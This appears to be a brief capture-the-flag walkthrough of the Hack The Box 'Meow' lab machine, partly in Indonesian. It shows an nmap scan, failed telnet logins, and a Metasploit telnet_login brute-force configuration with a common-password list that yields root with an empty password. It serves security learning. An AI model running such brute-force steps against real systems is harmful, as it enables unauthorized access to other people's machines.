Skip to content

Meow

#nmap #23/tcp #telnet #metasploit

nmap -sV <ip>
Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-10 00:59 WIB
Nmap scan report for <ip>
Host is up (0.25s latency).
Not shown: 999 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
23/tcp open  telnet  Linux telnetd
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 58.72 seconds
telnet <ip>
Trying <ip>...
Connected to <ip>.
Escape character is '^]'.


  █  █         ▐▌     ▄█▄ █          ▄▄▄▄
  █▄▄█ ▀▀█ █▀▀ ▐▌▄▀    █  █▀█ █▀█    █▌▄█ ▄▀▀▄ ▀▄▀
  █  █ █▄█ █▄▄ ▐█▀▄    █  █ █ █▄▄    █▌▄█ ▀▄▄▀ █▀█


Meow login:
Password:

Login incorrect
Meow login: admin
Password:

Login incorrect
Meow login: ^CConnection closed by foreign host.

brute force login, beberapa cara :

  1. metasploit
vim file.txt
admin
password
root
123456
msfconsole
search telnet_login
use auxiliary/scanner/telnet/telnet_login
set STOP_ON_SUCCESS true
set RHOST <ip>
set USER_FILE file.txt
set PASS_FILE file.txt
run

username root password <empty>

  1. cari sendiri mungkin ada:D